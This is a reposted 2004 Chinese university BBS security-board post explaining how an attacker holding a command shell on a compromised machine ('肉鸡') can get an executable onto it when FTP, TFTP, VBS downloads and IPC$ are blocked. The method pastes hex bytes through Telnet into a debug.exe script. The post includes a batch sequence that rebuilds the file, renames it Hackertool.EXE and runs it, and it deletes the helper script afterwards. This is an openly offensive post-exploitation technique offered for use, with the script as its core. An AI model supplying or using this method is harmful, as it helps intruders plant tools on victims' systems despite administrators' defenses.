[转载]一个无敌的向肉鸡上传exe文件方法

发信人: VictorWoo (人言可畏·莫惹愤青), 信区: Security
标  题: 一个无敌的向肉鸡上传exe文件方法 原创
发信站: 鼓浪听涛 (2004年08月29日10:03:26 星期天), 站内信件

危害大，只能给个思路，呵呵

作案条件：
拿到CmdShell，Debug.exe可用

可能有人准备砍我：拿到CmdShell还用你说啊。。。FTP/TFTP/VBS HTTP下载/IPC$……
但……要是碰到BT的网管呢？
这一贴适用于以下情况：
FTP被网管的防火墙拦了(这个正常)
TFTP被网管防火墙拦了(连UDP都拦，寒)
不然TFTP.EXE被网管删掉了(这个正常，现在黑客都爱用这个)
VBS写个HTTP下载的脚本，但脚本解析器被网管改名。(专业一点的网管应该想得到)
IPC$(不用说，肯定被防火墙ban掉了)

这个时候，除了郁闷，我还实践成一个办法：
利用Telnet的窗口来传输数据！
利用@echo来传输16进制数据铁定是失败的。好象连&号都不行，谁知道的告诉我一声。

这里提供一个思路：
用DEBUG的e命令把10进制数写入内存，然后再内存中把exe文件还原出来。
由于debug可以使用标准的重定向(> < >> <<)，所以非常方便。

@echo e 0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20>>ABC
@echo e 0110 6E 65 78 74 0D 0A 73 65 74 20 6F 75 74 73 74 72>>ABC
@echo e 0F20 2E 65 63 68 6F 20 73 74 72 69 6E 67 28 37 39 2C>>ABC
...;省略
@echo e 0F30 22 2A 22 29 26 76 62 63 72 6C 66 0D 0A 65 6E 64>>ABC
@echo rcx>>ABC
@echo 0E49>>ABC
@echo n ABCDEF>>ABC
@echo w>>ABC
@echo q>>ABC
@debug<ABC>nul
@del ABC
@ren ABCDEF Hackertool.EXE
@Hackertool.EXE

当然难度就在于如何把EXE程序整理成
0100 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 20
这样的格式，所以这个还是自己通过编程去实现吧^^

可以把那一大段直接粘贴到终端的窗口当中。
对应于不同的网速，可能有两种情况
网速快的话，可看到一行行的数字哗哗地往上滚动。。。想象一下象哪部电影的镜头？^^
网速慢的话，将看到一个@，半天不动。上一个厕所回来也搞定了。
我已经成功了^^

Victor.Woo@XMU


--
              表跑，看镖！            哇，厦大特快的愤青来了！
       愤  ＃  /                      &#39;ˋ  /
          ︿○╯         一           一  ︿○
       青  （︿    一              一     /︶
          〈  x  . . ﹍﹍ ﹎ . ﹎﹎     O o。 .﹀ √  VictorWoo
※ 修改:·VictorWoo 於 08月29日10:06:12 修改本文·[FROM: 218.193.7.47]
※ 来源:·鼓浪听涛 bbs.xmu.edu.cn·[FROM: 218.193.7.47]